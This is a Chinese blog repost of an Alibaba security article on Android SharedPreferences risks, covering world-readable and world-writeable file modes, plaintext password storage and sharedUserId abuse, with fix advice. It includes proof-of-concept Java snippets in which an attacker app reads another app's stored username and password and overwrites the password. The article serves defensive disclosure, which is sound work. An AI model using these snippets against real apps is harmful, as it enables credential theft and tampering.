Android本地数据存储:Shared Preferences安全风险浅析

最新推荐文章于 2024-05-04 20:00:00 发布
最新推荐文章于 2024-05-04 20:00:00 发布
阅读量4.6k 收藏 9
点赞数 1
分类专栏: Android点点滴滴 文章标签: 安全 Shared Preferences

1. 安卓Shared Preferences存储安全风险描述

      Android系统提供了以下四种Android应用本地存储方式:Shared Preferences、SQLite Databases、Internal Storage、External Storage等存储方式。Shared Preferences是一种轻量级的基于XML文件存储的键值对(key-value)数据的数据存储方式,一般用于储存应用的配置等信息【1】; 
      Shared Preferences存储安全风险源于:1)开发者在创建文件时没有正确的选取合适的创建模式(MODE_PRIVATE、MODE_WORLD_READABLE以及MODE_WORLD_WRITEABLE)进行权限控制;2)开发者过度依赖Android系统内部存储安全机制,将用户信息、密码等敏感重要的信息明文存储在Shared Preferences文件中,导致攻击者可通过root手机来查看敏感信息。
在乌云漏洞平台上,存在大量Shared Preferences文件中明文存储个人身份信息、密码以及token等重要敏感信息导致泄露的漏洞,如网易阅读Android客户端漏洞导致账号密码泄漏[2]、高朋团购网泄漏用户敏感信息[3]、苏宁易购用户敏感信息泄露[4]、最新江苏移动营业厅官方手机android客户端应用目录两个文件明文存储登录使用的服务密码手机号等信息[5]。

2.安卓Shared Preferences存储安全影响范围

      Android所有系统

3.安卓Shared Preferences存储安全风险详情

1) 风险位置:

SharedPreferences.getSharedPreferences(String prefName, int mode);

2) 风险触发前提条件:

      使用MODE_WORLD_READABLE模式创建Shared Preferences文件或使用MODE_WORLD_WRITEABLE模式创建Shared Preferences文件并含有“android:sharedUserId”属性值和测试签名;

3) 风险原理:

      a. 使用MODE_WORLD_READABLE模式创建Shared Preferences文件,使得其他应用对该Shared Preferences文件具备可读的权限;
      b. 使用MODE_WORLD_WRITEABLE模式创建Shared Preferences文件并含有“android:sharedUserId”属性值,使得其他应用对该应用的Shared Preferences文件具备可写的权限。
      c. 在具备root权限的程序或用户对任何应用程序通过任意模式创建的的Shared Preferences文件都具有可读可写的权限。

4. Shared Preferences存储安全风险POC

      1) 使用MODE_PRIVATE模式创建Shared Preferences文件,其他应用不可读取该应用的Shared Preferences文件的内容;
      通过MODE_PRIVATE模式创建Shared Preferences文件的代码片段: 
String user=mEtUserName.getText().toString();
String pass=mEtPassword.getText().toString();
SharedPreferences.Editor editor = getSharedPreferences("settings", Context.MODE_PRIVATE).edit();
editor.putString("username", user);
editor.putString("password", pass);
editor.commit();
      该POC应用启动后输入用户名和密码,然后点击登录之后将以MODE_PRIVATE模式创建Shared Preferences文件:
 
      通过adb shell进入系统终端,切换至su账户查看该应用创建的shared Preferences文件属性,得知其权限为“-rw-rw----”,其中others的权限不可读,如下图所示:
 

      通过adb shell进入系统终端,通过普通用户查看该应用创建的Shared Preferences文件,如下图所示,将提示“Permission denied”:

      其他应用查看该应用创建的Shared Preferences文件的代码片段: 
Context context = createPackageContext("com.alibaba.jaq.datastoragepoc", Context.CONTEXT_IGNORE_SECURITY);
SharedPreferences sharedPreferences = context.getSharedPreferences("settings", Context.MODE_WORLD_READABLE);
String username = sharedPreferences.getString("username", "");
String password = sharedPreferences.getString("password", "");
mBtnCrackerContent.setText("user: " + username + "pwd: " + password);
      通过adb logcat发现以下日志,即提示没有权限查看该Shared Preferences文件:
 
      2) 使用MODE_WORLD_READABLE模式创建Shared Preferences文件,其他应用可读取该应用创建的Shared Preferences文件,将会造成敏感信息泄露;
      通过MODE_WORLD_READABLE模式创建Shared Preferences文件的代码片段: 
String user=mEtUserName.getText().toString();
String pass=mEtPassword.getText().toString();
SharedPreferences.Editor editor = getSharedPreferences("settings", Context.MODE_WORLD_READABLE).edit();
editor.putString("username", user);
editor.putString("password", pass);
editor.commit();
      该POC应用启动后输入用户名和密码,然后点击登录之后将以MODE_WORLD_READABLE模式创建Shared Preferences文件:
 
      通过adb shell进入系统终端,切换至su账户查看该应用创建的Shared Preferences文件属性,得知其权限为“-rw-rw-r--”,其中others具有可读权限,如下图所示:
 

      通过adb shell进入普通用户的shell,查看通过MODE_WORLD_READABLE模式Shared Preferences文件”settings.xml”,文件内容如下图所示:

      攻击代码片段: 
Context context = createPackageContext("com.alibaba.jaq.datastoragepoc", Context.CONTEXT_IGNORE_SECURITY);
SharedPreferences sharedPreferences = context.getSharedPreferences("settings", Context.MODE_WORLD_READABLE);
String username = sharedPreferences.getString("username", "");
String password = sharedPreferences.getString("password", "");
mBtnCrackerContent.setText("user: " + username + "pwd: " + password);
      启动攻击应用,即可获取到包名为“com.alibaba.jaq.datastoragepoc”应用的Shared Preferences文件“settings.xml”的内容键值:
 
      3) 使用MODE_WORLD_WRITEABLE模式创建Shared Preferences,虽然其他应用不可读取该应用的Shared Preferences文件,但是如果恶意应用与该POC应用具有相同的“android:sharedUserId”属性值和签名key时,恶意应用即可对其Shared Preferences文件进行写操作;
      通过MODE_WORLD_WRITEABLE模式创建Shared Preferences的代码片段: 
String user=mEtUserName.getText().toString();
String pass=mEtPassword.getText().toString();
SharedPreferences.Editor editor = getSharedPreferences("settings", Context.MODE_WORLD_WRITEABLE).edit();
editor.putString("username", user);
editor.putString("password", pass);
editor.commit();
      该POC应用启动后输入用户名和密码,然后点击登录之后将以MODE_WORLD_WRITEABLE模式创建Shared Preferences文件:

      通过adb shell进入系统终端,切换至su账户查看创建的shared Preferences文件的权限为“-rw-rw--w-”,其中others具有可写权限,如下图所示:

 

      通过adb shell进入普通用户的shell,查看通过MODE_WORLD_WRITEABLE模式shared Preferences文件”settings.xml”, 如下图所示,将提示“Permission denied”:
 
      读取其他应用的shared Preferences的攻击代码片段: 
Context context = createPackageContext("com.alibaba.jaq.datastoragepoc", Context.CONTEXT_IGNORE_SECURITY);
SharedPreferences sharedPreferences = context.getSharedPreferences("settings", Context.MODE_WORLD_READABLE);
String username = sharedPreferences.getString("username", "");
String password = sharedPreferences.getString("password", "");
mBtnCrackerContent.setText("user: " + username + "pwd: " + password);
      启动攻击应用读取包名为“com.alibaba.jaq.datastoragepoc”应用的shared Preference文件“settings.xml”时,将提示“Permission denied”:
 
      写其他应用的Shared Preferences文件的攻击代码片段: 
Context context = createPackageContext("com.alibaba.jaq.datastoragepoc", Context.CONTEXT_IGNORE_SECURITY);
SharedPreferences.Editor editor = context.getSharedPreferences("settings", Context.MODE_WORLD_WRITEABLE).edit();
editor.putString("password", "hacked");
editor.commit();
      当受害应用和攻击应用都相同含有“android:sharedUserId”属性值时,攻击者即可对受害应用的Shared Perferences有写的权限:
受害者应用AndroidManifest.xml文件内容: 
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.alibaba.jaq.datastoragepoc"
          android:versionCode="1"
          android:versionName="1.0"
          android:sharedUserId="jaq.poc">
    <uses-sdk android:minSdkVersion="10"/>
    <application android:label="@string/app_name"
                 >
        <activity android:name="MainActivity"
                  android:label="@string/app_name">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
    </application>
</manifest>
      攻击者应用AndroidManifest.xml文件内容: 
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.alibaba.jaq.datastoragecrackerpoc"
          android:versionCode="1"
          android:versionName="1.0"
          android:sharedUserId="jaq.poc">
    <uses-sdk android:minSdkVersion="10"/>
    <application android:label="@string/app_name"
                 >
        <activity android:name="CrackerActivity"
                  android:label="@string/app_name">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
    </application>
</manifest>
      下图结果显示,当受害应用和攻击应用都相同含有“android:sharedUserId”属性值时,攻击者可写入受害应用通过MODE_WORLD_WRITEABLE模式创建的Shared Preferences:
 

4) root下可任意读写应用创建的Shared Preferences,因此不可将密码等用户敏感信息明文存储在Shared Preferences中,以防止Android设备被root之后,造成敏感信息的泄露以及财产损失;

 

5.Shared Preferences存储安全风险修复建议

      1. 避免使用MODE_WORLD_WRITEABLE和MODE_WORLD_READABLE模式创建进程间通信的文件,此处即为Shared Preferences;

      出于安全考虑,阿里聚安全建议不要使用全局可读模式和全局可写模式创建进程间通信的文件,此处即为但不限于Shared Preferences。如果需要与其他进程应用进行数据共享,请考虑使用content provider,详情参照Google官方安全指导[6]。


      2. 避免将密码等敏感数据信息明文存储在Shared Preferences中;

      出于安全考虑,阿里聚安全建议不要将密码等敏感信息存储在Shared Preferences等内部存储中,即使Android系统内部存储安全机制,使得内部存储文件可不让其他应用读写,但是在Android系统root之后,该安全机制将失效而导致信息泄露。因此应该将敏感信息进行加密存储在Shared Preferences等内部存储文件中,详情参照Google官方安全指导[6]。
   

      3. 避免滥用“android:sharedUserId”属性;

      阿里聚安全建议不要在使用“android:sharedUserId”属性的同时,对应用使用测试签名,否则其他应用拥有“android:sharedUserId”属性值和测试签名时,将会访问到内部存储文件数据 [7]。


引用
[1] http://developer.android.com/guide/topics/data/data-storage.html#pref
[2] http://www.wooyun.org/bugs/wooyun-2010-010056
[3] http://www.wooyun.org/bugs/wooyun-2010-016309
[4] http://www.wooyun.org/bugs/wooyun-2010-014308
[5] http://www.wooyun.org/bugs/wooyun-2010-079232
[6]http://developer.android.com/training/articles/security-tips.html#StoringData

[7]http://developer.android.com/guide/topics/manifest/manifest-element.html#uid



原文地址:http://jaq.alibaba.com/blog.htm?id=56

大水怪lzy
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Android 使用Shared Preferences进行数据存储-样例.rar
07-10
Android 使用Shared Preferences进行数据存储-样例,演示如何使用 Shared Preferences 获得数据和保存数据、如何使用getPreferences方法创建文件的模式,以及如何使用getPreferences模拟用户参数设置、查看 Preferences 生成的文件等操作,你可以比较一下与Files和SQLITE数据存储的区别。
使用SharedPreferences保存数据数据取出延迟或丢失的问题
csdn_liuwen的博客
08-21 9585
SharedPreferences更改数据后多处读取,数据丢失或延时的问题的原因和解决办法先说一下遇到这个问题的场景,由于我的项目中使用了SharePreference保存一个状态,然后通过获取这个状态来控制后面的逻辑,也就是这个状态是要频繁的去获取的,那势必对这个状态的更改后再重新获取的灵敏度依赖是很高的.然后就出现了这样一个问题,在主进程的某个文件中更改了这个状态后,主进程中可以很实时的获取到(
Android SharedPreference 数据写入不成功可能的原因
langhua292的专栏
07-25 8843
m_iSharedPre = getSharedPreferences("MyTest", MODE_PRIVATE); 如果用以下方式写入数据: m_iSharedPre.edit().putInt("aa", 100); m_iSharedPre.edit().commit(); 那么当获取数据的时候 m_iSharedPre.getInt("aa", 0); 永远返回默认值
细数SharedPreferences的5大缺陷及ANR原因
weixin_55362248的博客
03-19 550
我们经常使用的SharedPreferences其实是存在很多缺陷的,主要表现在 占用内存 getValue时可能导致ANR 不支持多进程 不支持全量更新 commit或apply都可能导致ANR 以下参考安卓源码的基础上,使用大白话和部分代码片段和大家一起探讨分享。 占用内存 final class SharedPreferencesImpl implements SharedPreferences { ...... //构造方法 SharedPreferenc
Android中的SharedPreferences陷阱
啦啦啦~~
09-26 713
Android中的SharedPreferences陷阱 将保存SharedPreferences的xml文件删除了,能够彻底删除对应的SharedPreferences吗? 一次开发过程中,一个功能是需要将程序缓存清除掉,包括SharedPreferences文件。 第一次做的方式是,把相关的文件删除。但是发现有问题:程序退出后,再次进入程序仍然能够读取到应该被删除掉的Sh
Android SharedPreferences加密存储
奋斗
10-09 1197
我们都知道sharedPreferences是将信息以键值对的xml格式对存储应用的对应目录下。对于一些重要信息就十分不安全。我们需要对信息进行加密存储。 即使是加密存储,秘钥的管理也十分重要,如何才能让秘钥不被外界获取,这里我们使用Android系统提供的AndroidKeyStore来提供秘钥,最大程度保证安全性。 object AppKeyStore { private var sApplicationContext: Context? = null private var sSys
Android SharedPerFrences 储存不及时问题
w_ya_bin的博客
08-15 612
       最近调车载软件的时候使用SharedPerFrences储存数据,但是呢测出来一个bug,就是直接给板子断电(也就是车主直接拔钥匙,直接关机),然后使用SharedPerFrences存起来的数据是没有存储成功的,SharedPerFrences实际上是写在一个文件中,Android系统底层对SharedPerFrences有处理,不管咱们使用commit或者apply方法都不能做到...
Android 退出app再次进入无法获取存放在shareprefenrence中的内容
fenyan2669的博客
01-08 464
java.lang.NullPointerException: Attempt to invoke virtual method 'int java.lang.Integer.intValue()' on a null object reference new SharePreferencePersistance().readString(MyApplication.getAppContex
android sharedpreferences加密,(译)使用AndroidX安全库加密SharedPreferences
weixin_29471009的博客
05-30 1045
本文译自Encrypting Shared Preferences with the AndroidX Security Library,介绍了AndroidX安全库中EncryptedSharedPreferences的使用。备注:仅支持minSdkVersion 23及以上。《离思五首·其四》曾经沧海难为水,除却巫山不是云。取次花丛懒回顾,半缘修道半缘君。-唐代,元稹Android框架给我们提...
AndroidManifest.xml中含盖的安全问题
samli的博客
03-16 1039
0x00 关于AndroidManifest.xml AndroidManifest.xml 是每个android程序中必须的文件。它位于整个项目的根目录,Manifest文件提供有关应用程序到Android系统的基本信息,系统必须具有该信息才能运行任何应用程序的代码。换句话说APP是跑在Android系统上,既然要跑在其上,就必须提供信息给Android System,这些信息就存在And...
android 数据存储Shared Preferences
07-29
NULL 博文链接:https://byandby.iteye.com/blog/833292
Android数据持久化之Preferences机制详解
01-21
Preferences是一种轻量级的数据存储机制,他将一些简单的数据类型的数据,包括boolean类型,int类型,float类型,long类型以及String类型的数据,以键值对的形式存储应用程序的私有Preferences目录(/data/data/&...
Android代码-一个快速方便地访问Android Shared preferences 库。
08-06
FastSave is An Android library for fast and easy access to Android Shared preferences. It allows you to save any type or list in the sharedpreferences and retrieve it in convenient way. Installation ...
保护通信的双重安全:消息认证与身份认证
JAZJD的博客
04-28 1470
在网络通信中,散列函数扮演着至关重要的角色。散列函数是一种将任意长度的数据转换成固定长度散列值的算法。这种转换过程是单向的,即无法通过散列值逆向推导出原始数据。常见的散列函数包括MD5、SHA-1和SHA-256等。例如,SHA-256能够将任意长度的数据转换成256位的散列值,具有较高的安全性和抗碰撞性。消息认证是确保通信数据完整性和真实性的重要手段。通过在数据中添加消息认证码(MAC),可以防止数据被篡改或伪造。常见的消息认证算法包括HMAC(基于散列的消息认证码)和CMAC(密码消息认证码)等。
PHP医疗不良事件上报系统源码 AEMS开发工具vscode+ laravel8 医院安全(不良)事件报告系统源码 可提供演示
最新发布
zmm201453的博客
05-04 518
医院安全不良事件报告系统(AEMS);分为外部报告系统和内部报告系统两类。内部报告系统主要以个人为报告单位,由医院护理主管部门自行管理的报告系统。外部报告系统主要以医院护理主管部门为报告单位,由卫生行政部门或行业组织管理的报告 系统。
CACTER AI实验室:AI大模型在邮件安全领域的应用
CACTER_S的博客
04-29 1029
CACTER AI实验室将继续探索和应用AI大模型,更新迭代新型恶意邮件的检测能力,保持反垃圾品质稳步提升,保护用户的邮件安全
API安全
2301_76717406的博客
05-01 1500
网络安全,信息(数据安全应用安全;机密性完整性可靠性。
等保测评常见安全风险
weixin_64392888的博客
04-28 748
9. **网络分段风险**:二级及以上系统应将重要网络区域和非重要网络区域划分在不同网段或子网,避免生产网络和办公网络混在一起带来的风险。1. **信息泄露风险**:评估系统中存储、传输和处理的敏感信息的安全性,防止数据被非法获取,避免个人隐私泄露或公司机密泄露等问题。13. **个人信息保护风险**:二级及以上系统在未授权的情况下不应采集、存储用户个人隐私信息,避免违规行为带来的风险。5. **不安全的通信风险**:评估传输数据时的加密和解密机制,确保数据在传输过程中的安全,防止数据被窃听或篡改。
Linux服务器安全基础 - 查看入侵痕迹
eagle89的专栏
04-30 1165
Linux服务器安全基础 - 查看入侵痕迹
flutter使用Shared Preferences进行数据持久化的示例代码
04-04
以下是使用Shared Preferences进行数据持久化的示例代码: ```dart import 'package:flutter/material.dart'; import 'package:shared_preferences/shared_preferences.dart'; class ExamplePage extends StatefulWidget { @override _ExamplePageState createState() => _ExamplePageState(); } class _ExamplePageState extends State<ExamplePage> { TextEditingController _controller = TextEditingController(); String _savedText = ''; @override void initState() { super.initState(); _loadSavedText(); } void _loadSavedText() async { SharedPreferences prefs = await SharedPreferences.getInstance(); String savedText = prefs.getString('savedText') ?? ''; setState(() { _savedText = savedText; _controller.text = savedText; }); } void _saveText(String text) async { SharedPreferences prefs = await SharedPreferences.getInstance(); await prefs.setString('savedText', text); } @override Widget build(BuildContext context) { return Scaffold( appBar: AppBar( title: Text('Example Page'), ), body: Padding( padding: EdgeInsets.all(16.0), child: Column( crossAxisAlignment: CrossAxisAlignment.stretch, children: <Widget>[ TextField( controller: _controller, decoration: InputDecoration( labelText: 'Enter some text', ), onChanged: (text) { _saveText(text); }, ), SizedBox(height: 16.0), Text( 'Saved text: $_savedText', style: TextStyle(fontSize: 18.0), ), ], ), ), ); } } ``` 在上述代码中,我们首先在initState()方法中加载之前保存的文本,并将其设置为文本框的默认值。然后,我们在文本框中输入文本时使用SharedPreferences实例保存文本。最后,我们将保存的文本显示在屏幕上。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值